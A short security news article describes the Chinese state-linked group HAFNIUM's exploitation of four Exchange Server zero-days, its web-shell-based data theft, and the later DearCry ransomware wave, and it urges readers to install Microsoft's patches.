HAFNIUM is the designation given by Microsoft to a new hacker group that is believed to be located in China and backed by the Chinese government. The HAFNIUM hackers show high levels of proficiency and sophistication in their malicious operations. The primary goal of this threat actor has been the exfiltration of sensitive data from entities in the United States. The targeted victims are spread across multiple industry sectors and range from law firms, education institutions, and disease researchers to defense contractors and NGOs (Non-governmental organizations). Despite being based in China, HAFNIUM has incorporated leased VPS (Virtual Private Servers) in the United States as part of their malicious operations.
The cybersecurity analysts at Microsoft had already been monitoring the activity of HAFNIUM for quite some time before deciding to go public with their findings in the wake of the latest attack campaign carried out by the threat actor. HAFNIUM exploited four zero-day vulnerabilities that affected on-premises Exchange Server software. The discovered vulnerabilities were tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, and represented such a severe security weakness that Microsoft released several urgent updates addressing the issue.
The attack chain of this HAFNIUM operation includes three steps. First, the hackers breach the target through either the four zero-day exploits or by having access to stolen credentials. Once inside, they would create a web shell that allows remote control over the compromised server. In the last step, the threat actor would gain access to email accounts and download the Exchange offline address book that contains various information about the victim organization and its users. The chosen data would be collected in archive files such as .7z and .ZIP and then exfiltrated. In past campaigns, HAFNIUM has often uploaded the information collected from their victims to third-party data-sharing websites such as MEGA.
The web shell also allows for additional malware payloads to be deposited onto the breached server, likely to ensure prolonged access to the victim's system.
Customers who use on-premises Exchange Server are strongly encouraged to install the security updates released by Microsoft and to check out the company's security blog where numerous IoC (Indicators of Compromise) have been detailed.
With information about the HAFNIUM attack becoming public, it didn't take long for other hacker groups to start abusing the same four zero-day vulnerabilities in their own operations. In just nine days following the reveal of the exploits, Microsoft detected that a threat actor has begun spreading a new strain of ransomware called DearCry, showing just how fast cybercriminals have become in adjusting their infrastructure to incorporate newly discovered security weaknesses.